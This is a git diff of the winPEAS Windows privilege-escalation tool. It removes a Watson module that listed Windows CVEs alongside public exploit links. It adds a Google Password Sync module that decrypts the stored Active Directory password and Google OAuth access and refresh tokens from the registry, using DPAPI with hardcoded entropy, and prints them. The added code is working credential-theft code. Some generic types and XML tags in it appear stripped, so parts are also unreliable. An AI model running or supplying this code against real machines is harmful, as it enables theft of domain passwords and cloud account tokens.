-namespace winPEAS._3rdParty.Watson -{ - public class Vulnerability - { - public string Identification { get; } - public string[] KnownExploits { get; } - public bool Vulnerable { get; private set; } - - public Vulnerability(string id, string[] exploits) - { - Identification = id; - KnownExploits = exploits; - } - - public void SetAsVulnerable() - => Vulnerable = true; - } -} diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/VulnerabilityCollection.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/VulnerabilityCollection.cs deleted file mode 100644 index 69ca195..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/VulnerabilityCollection.cs +++ /dev/null @@ -1,111 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using winPEAS.Helpers; - -namespace winPEAS._3rdParty.Watson -{ - public class VulnerabilityCollection - { - private readonly List _vulnerabilities; - - public void SetAsVulnerable(string id) - => _vulnerabilities.First(e => e.Identification == id).SetAsVulnerable(); - - public VulnerabilityCollection() - { - _vulnerabilities = Populate(); - } - - public void ShowResults() - { - foreach (Vulnerability vuln in _vulnerabilities.Where(i => i.Vulnerable)) - { - Beaprint.BadPrint($" [!] {vuln.Identification} : VULNERABLE"); - - foreach (string exploit in vuln.KnownExploits) - { - Beaprint.BadPrint($" [>] {exploit}"); - } - - Console.WriteLine(); - } - - if (_vulnerabilities.Any(e => e.Vulnerable)) - { - Beaprint.BadPrint($" [*] Finished. Found {_vulnerabilities.Count(i => i.Vulnerable)} potential vulnerabilities.\r\n"); - } - else - { - Beaprint.GoodPrint(" [*] Finished. Found 0 vulnerabilities.\r\n"); - } - } - - private List Populate() - { - return new List() - { - new Vulnerability( - id: "CVE-2019-0836", - exploits: new string[] { "https://exploit-db.com/exploits/46718", "https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/" } - ), - - new Vulnerability( - id: "CVE-2019-0841", - exploits: new string[] { "https://github.com/rogue-kdc/CVE-2019-0841", "https://rastamouse.me/tags/cve-2019-0841/" } - ), - - new Vulnerability( - id: "CVE-2019-1064", - exploits: new string[] { "https://www.rythmstick.net/posts/cve-2019-1064/" } - ), - - new Vulnerability( - id: "CVE-2019-1130", - exploits: new string[] { "https://github.com/S3cur3Th1sSh1t/SharpByeBear" } - ), - - new Vulnerability( - id: "CVE-2019-1253", - exploits: new string[] { "https://github.com/padovah4ck/CVE-2019-1253", "https://github.com/sgabe/CVE-2019-1253" } - ), - - new Vulnerability( - id: "CVE-2019-1315", - exploits: new string[] { "https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html" } - ), - - new Vulnerability( - id: "CVE-2019-1385", - exploits: new string[] { "https://www.youtube.com/watch?v=K6gHnr-VkAg" } - ), - - new Vulnerability( - id: "CVE-2019-1388", - exploits: new string[] { "https://github.com/jas502n/CVE-2019-1388" } - ), - - new Vulnerability( - id: "CVE-2019-1405", - exploits: new string[] { "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/", "https://github.com/apt69/COMahawk" } - ), - new Vulnerability( - id: "CVE-2020-0668", - exploits: new string[] { "https://github.com/itm4n/SysTracingPoc" } - ), - new Vulnerability( - id: "CVE-2020-0683", - exploits: new string[] { "https://github.com/padovah4ck/CVE-2020-0683", "https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1" } - ), - new Vulnerability( - id: "CVE-2020-1013", - exploits: new string[] { "https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/" } - ), - new Vulnerability( - id: "CVE-2020-0796", - exploits: new string[] { "https://github.com/danigargu/CVE-2020-0796 (smbghost)" } - ) - }; - } - } -} diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs deleted file mode 100644 index 307cf94..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs +++ /dev/null @@ -1,80 +0,0 @@ -using System; -using System.Collections.Generic; -using winPEAS.Helpers; -using winPEAS._3rdParty.Watson.Msrc; - -namespace winPEAS._3rdParty.Watson -{ - - ////////////////////////////// - ////// MAIN WATSON CLASS ///// - ////////////////////////////// - class Watson - { - public static void FindVulns() - { - Console.WriteLine(Beaprint.YELLOW + " [?] " + Beaprint.LBLUE + "Windows vulns search powered by " + Beaprint.LRED + "Watson" + Beaprint.LBLUE + "(https://github.com/rasta-mouse/Watson)" + Beaprint.NOCOLOR); - - // Supported versions - var supportedVersions = new Dictionary() - { - { 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" }, - { 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" }, - { 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" } - }; - - // Get OS Build number - var buildNumber = Wmi.GetBuildNumber(); - if (buildNumber != 0) - { - if (!supportedVersions.ContainsKey(buildNumber)) - { - Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'"); - } - - var version = supportedVersions[buildNumber]; - Console.WriteLine(" [*] OS Version: {0} ({1})", version, buildNumber); - } - else - { - Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber"); - } - - // List of KBs installed - Console.WriteLine(" [*] Enumerating installed KBs..."); - var installedKBs = Wmi.GetInstalledKBs(); - -#if DEBUG - Console.WriteLine(); - - foreach (var kb in installedKBs) - { - Console.WriteLine(" {0}", kb); - } - - Console.WriteLine(); -#endif - - // List of Vulnerabilities - var vulnerabilities = new VulnerabilityCollection(); - - // Check each one - CVE_2019_0836.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_0841.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_1064.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_1130.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_1253.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_1315.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_1385.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_1388.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2019_1405.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2020_0668.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2020_0683.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2020_1013.Check(vulnerabilities, buildNumber, installedKBs); - CVE_2020_0796.Check(vulnerabilities, buildNumber, installedKBs); - - // Print the results - vulnerabilities.ShowResults(); - } - } -} diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Wmi.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Wmi.cs deleted file mode 100644 index 1f8fd06..0000000 --- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Wmi.cs +++ /dev/null @@ -1,65 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Management; - -namespace winPEAS._3rdParty.Watson -{ - public class Wmi - { - public static List GetInstalledKBs() - { - var KbList = new List(); - - try - { - using (var searcher = new ManagementObjectSearcher(@"root\cimv2", "SELECT HotFixID FROM Win32_QuickFixEngineering")) - { - using (var hotFixes = searcher.Get()) - { - foreach (var hotFix in hotFixes) - { - var line = hotFix["HotFixID"].ToString().Remove(0, 2); - - if (int.TryParse(line, out int kb)) - { - KbList.Add(kb); - } - } - } - } - } - catch (ManagementException e) - { - Console.Error.WriteLine(" [!] {0}", e.Message); - } - - return KbList; - } - - public static int GetBuildNumber() - { - try - { - using (var searcher = new ManagementObjectSearcher(@"root\cimv2", "SELECT BuildNumber FROM Win32_OperatingSystem")) - { - using (var collection = searcher.Get()) - { - foreach (var num in collection) - { - if (int.TryParse(num["BuildNumber"] as string, out int buildNumber)) - { - return buildNumber; - } - } - } - } - } - catch (ManagementException e) - { - Console.Error.WriteLine(" [!] {0}", e.Message); - } - - return 0; - } - } -} diff --git a/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs index 0f52937..78a2ec7 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs @@ -17,6 +17,7 @@ namespace winPEAS.Checks new GCPInfo(), new GCPJoinedInfo(), new GCDSInfo(), + new GPSInfo(), }; foreach (var cloudInfo in cloudInfoList) diff --git a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs index d8950b0..41260ec 100644 --- a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs +++ b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs @@ -5,7 +5,6 @@ using System.Linq; using System.Reflection; using System.Runtime.InteropServices; using System.Text.RegularExpressions; -using winPEAS._3rdParty.Watson; using winPEAS.Helpers; using winPEAS.Helpers.AppLocker; using winPEAS.Helpers.Extensions; @@ -108,10 +107,6 @@ namespace winPEAS.Checks }; Beaprint.DictPrint(basicDictSystem, colorsSI, false); Console.WriteLine(); - Watson.FindVulns(); - - //To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function) - //Usually you won't need to do anything with the classes Wmi, Vulnerability and VulnerabilityCollection } catch (Exception ex) { diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GPSInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GPSInfo.cs new file mode 100644 index 0000000..8cd012d --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GPSInfo.cs @@ -0,0 +1,304 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Security.Cryptography; +using System.Text; +using winPEAS.Helpers; +using System.Data.SQLite; +using Org.BouncyCastle.Crypto; +using Org.BouncyCastle.Crypto.Parameters; +using Org.BouncyCastle.Crypto.Modes; +using System.Linq; +using Microsoft.Win32; +using System.Web.Script.Serialization; +using System.Text.RegularExpressions; +using System.Runtime.InteropServices; + + +namespace winPEAS.Info.CloudInfo +{ + internal class GPSInfo : CloudInfoBase + { + public override string Name => "Google Password Sync"; + + public override bool IsCloud => CheckIfGPSInstalled(); + + private Dictionary> _endpointData = null; + + public static bool CheckIfGPSInstalled() + { + string[] check = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Google\Google Apps Password Sync"); + bool regExists = check != null && check.Length > 0; + bool result = regExists || File.Exists(@"C:\Program Files\Google\Password Sync\PasswordSync.exe") || File.Exists(@"C:\Program Files\Google\Password Sync\password_sync_service.exe"); + return result; + } + + private List GetGPSValues() + { + Dictionary GPSRegValues = new Dictionary(); + + // Check config file + string path_config = @"C:\ProgramData\Google\Google Apps Password Sync\config.xml"; + if (File.Exists(path_config)) + { + try + { + // Load the XML file + string xmlContent = File.ReadAllText(path_config); + + // Extract values using Regex + string baseDN = ExtractValue(xmlContent, @"(.*?)<\/baseDN>"); + string authorizedUsername = ExtractValue(xmlContent, @"(.*?)<\/authorizedUsername>"); + string anonymousAccess = ExtractValue(xmlContent, @" 0) + { + try + { + Native.Advapi32 advapi = new Native.Advapi32(); + byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b }; + + // Decrypt auth token + byte[] encryptedEncodedAuthToken = advapi.ReadRegistryValue(regAddr, @"AuthToken"); + byte[] decryptedData = DecryptData(encryptedEncodedAuthToken, entropyBytes); + string base32hexEncodedString = Encoding.Unicode.GetString(decryptedData).TrimEnd('\0'); + + // Decode decrypted auth token + byte[] originalData = Base32HexDecoder.Decode(base32hexEncodedString); + string plainAuthToken = Encoding.Unicode.GetString(originalData).TrimEnd('\0'); + + // Find tokens via regexes + string accessTokenRegex = @"ya29\.[a-zA-Z0-9_\-]{50,}"; + string refreshTokenRegex = @"1//[a-zA-Z0-9_\-]{50,}"; + + MatchCollection accesTokens = Regex.Matches(plainAuthToken, accessTokenRegex); + MatchCollection refreshTokens = Regex.Matches(plainAuthToken, refreshTokenRegex); + + if (refreshTokens.Count > 0) + { + GPSRegValues.Add("Decrypted refresh token", refreshTokens[0].Value); + } + + if (accesTokens.Count > 0) + { + GPSRegValues.Add("Decrypted access token", accesTokens[0].Value); + } + } + catch (Exception ex) + { + Beaprint.PrintException("Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr + " (key: AuthToken)\nError was: " + ex.Message); + GPSRegValues.Add("authToken (error)", "Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr); + } + } + + string adpasswordInReg = Helpers.Registry.RegistryHelper.GetRegValue(hive, regAddr, @"ADPassword"); + if (adpasswordInReg.Length > 0) + { + try + { + Native.Advapi32 advapi = new Native.Advapi32(); + byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 }; + + + // Decrypt auth token + byte[] encryptedEncodedAuthToken = advapi.ReadRegistryValue(regAddr, @"ADPassword"); + byte[] decryptedData = DecryptData(encryptedEncodedAuthToken, entropyBytes); + string plainPasswd = Encoding.Unicode.GetString(decryptedData).TrimEnd('\0'); + GPSRegValues.Add("ADPassword decrypted", plainPasswd); + } + catch (Exception ex) + { + Beaprint.PrintException("Error trying to decrypt and decode the ADPassword. You will need to check it yourself. It's in " + hive + "\\" + regAddr + " (key: ADPassword)\nError was: " + ex.Message); + GPSRegValues.Add("ADPassword (error)", "Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr); + } + } + } + + // Format the info in expected CloudInfo format + List _endpointDataList = new List(); + + foreach (var kvp in GPSRegValues) + { + _endpointDataList.Add(new EndpointData() + { + EndpointName = kvp.Key, + Data = kvp.Value?.Trim(), + IsAttackVector = false + }); + } + + return _endpointDataList; + } + + public string ExtractValue(string input, string pattern) + { + Match match = Regex.Match(input, pattern); + if (match.Success) + { + return match.Groups[1].Value; + } + return "Not found"; + } + + + public override Dictionary> EndpointDataList() + { + if (_endpointData == null) + { + _endpointData = new Dictionary>(); + + try + { + if (IsAvailable) + { + _endpointData.Add("Local Info", GetGPSValues()); + } + else + { + _endpointData.Add("General Info", new List() + { + new EndpointData() + { + EndpointName = "", + Data = null, + IsAttackVector = false + } + }); + } + } + catch (Exception ex) + { + Beaprint.PrintException(ex.Message); + } + } + + return _endpointData; + } + + public override bool TestConnection() + { + return true; + } + + public byte[] DecryptData(byte[] encryptedData, byte[] entropyBytes) + { + Native.Crypt32.DATA_BLOB dataIn = new Native.Crypt32.DATA_BLOB(); + Native.Crypt32.DATA_BLOB dataOut = new Native.Crypt32.DATA_BLOB(); + Native.Crypt32.DATA_BLOB optionalEntropy = new Native.Crypt32.DATA_BLOB(); + + try + { + // Prepare the DATA_BLOB for input data + dataIn.pbData = Marshal.AllocHGlobal(encryptedData.Length); + dataIn.cbData = encryptedData.Length; + Marshal.Copy(encryptedData, 0, dataIn.pbData, encryptedData.Length); + + // Initialize output DATA_BLOB + dataOut.pbData = IntPtr.Zero; + dataOut.cbData = 0; + + // Prepare the DATA_BLOB for optional entropy + optionalEntropy.pbData = Marshal.AllocHGlobal(entropyBytes.Length); + optionalEntropy.cbData = entropyBytes.Length; + Marshal.Copy(entropyBytes, 0, optionalEntropy.pbData, entropyBytes.Length); + + // Call CryptUnprotectData with optional entropy + bool success = Native.Crypt32.CryptUnprotectData( + ref dataIn, + null, + ref optionalEntropy, + IntPtr.Zero, + IntPtr.Zero, + 0, + ref dataOut); + + if (!success) + throw new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error()); + // Copy decrypted data to a byte array + byte[] decryptedData = new byte[dataOut.cbData + 2]; + Marshal.Copy(dataOut.pbData, decryptedData, 0, dataOut.cbData); + + return decryptedData; + } + finally + { + // Free allocated memory + if (dataIn.pbData != IntPtr.Zero) + Marshal.FreeHGlobal(dataIn.pbData); + if (dataOut.pbData != IntPtr.Zero) + Marshal.FreeHGlobal(dataOut.pbData); + if (optionalEntropy.pbData != IntPtr.Zero) + Marshal.FreeHGlobal(optionalEntropy.pbData); + } + } + } +} + + + + +public static class Base32HexDecoder +{ + private static readonly char[] Alphabet = "0123456789abcdefghijklmnopqrstuv".ToCharArray(); + private static readonly Dictionary CharMap = new Dictionary(); + + static Base32HexDecoder() + { + for (int i = 0; i < Alphabet.Length; i++) + { + CharMap[Alphabet[i]] = i; + } + } + + public static byte[] Decode(string input) + { + input = input.ToLowerInvariant(); + List bytes = new List(); + + int buffer = 0; + int bitsLeft = 0; + + foreach (char c in input) + { + if (!CharMap.ContainsKey(c)) + throw new ArgumentException("Invalid character in base32hex string."); + + buffer = (buffer << 5) | CharMap[c]; + bitsLeft += 5; + + if (bitsLeft >= 8) + { + bitsLeft -= 8; + bytes.Add((byte)((buffer >> bitsLeft) & 0xFF)); + } + } + + return bytes.ToArray(); + } +} \ No newline at end of file diff --git a/winPEAS/winPEASexe/winPEAS/Native/Advapi32.cs b/winPEAS/winPEASexe/winPEAS/Native/Advapi32.cs index 3cde34e..be4c408 100644 --- a/winPEAS/winPEASexe/winPEAS/Native/Advapi32.cs +++ b/winPEAS/winPEASexe/winPEAS/Native/Advapi32.cs @@ -1,4 +1,6 @@ -using System; +using Microsoft.Win32; +using Microsoft.Win32.SafeHandles; +using System; using System.Runtime.ConstrainedExecution; using System.Runtime.InteropServices; using System.Security.AccessControl; @@ -222,6 +224,58 @@ namespace winPEAS.Native ref uint cchReferencedDomainName, out SID_NAME_USE peUse); + // P/Invoke declaration for RegQueryValueExW + [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + public static extern int RegQueryValueExW( + SafeRegistryHandle hKey, + string lpValueName, + IntPtr lpReserved, + out uint lpType, + byte[] lpData, + ref uint lpcbData); + + public byte[] ReadRegistryValue(string keyPath, string valueName) + { + using (RegistryKey baseKey = Registry.LocalMachine) // Access HKLM + using (RegistryKey subKey = baseKey.OpenSubKey(keyPath, writable: false)) + { + if (subKey == null) + throw new InvalidOperationException("Registry key not found."); + + SafeRegistryHandle hKey = subKey.Handle; + uint lpType; + uint dataSize = 0; + + // First call to determine the size of the data + int ret = RegQueryValueExW( + hKey, + valueName, + IntPtr.Zero, + out lpType, + null, + ref dataSize); + + if (ret != 0) + throw new System.ComponentModel.Win32Exception(ret); + + byte[] data = new byte[dataSize]; + + // Second call to get the actual data + ret = RegQueryValueExW( + hKey, + valueName, + IntPtr.Zero, + out lpType, + data, + ref dataSize); + + if (ret != 0) + throw new System.ComponentModel.Win32Exception(ret); + + return data; + } + } + public static string TranslateSid(string sid) { // adapted from http://www.pinvoke.net/default.aspx/advapi32.LookupAccountSid diff --git a/winPEAS/winPEASexe/winPEAS/Native/crypt32.cs b/winPEAS/winPEASexe/winPEAS/Native/crypt32.cs new file mode 100644 index 0000000..4ba2461 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Native/crypt32.cs @@ -0,0 +1,27 @@ +using System; +using System.Runtime.InteropServices; +using System.Text; + +namespace winPEAS.Native +{ + internal class Crypt32 + { + // P/Invoke declaration for CryptUnprotectData + [StructLayout(LayoutKind.Sequential)] + public struct DATA_BLOB + { + public int cbData; + public IntPtr pbData; + } + + [DllImport("crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)] + public static extern bool CryptUnprotectData( + ref DATA_BLOB pDataIn, + StringBuilder ppszDataDescr, + ref DATA_BLOB pOptionalEntropy, + IntPtr pvReserved, + IntPtr pPromptStruct, + int dwFlags, + ref DATA_BLOB pDataOut); + } +} diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj index c9d0489..d309e40 100644 --- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj +++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj @@ -1220,6 +1220,7 @@ + @@ -1378,6 +1379,7 @@ + @@ -1452,23 +1454,6 @@ - - - - - - - - - - - - - - - - -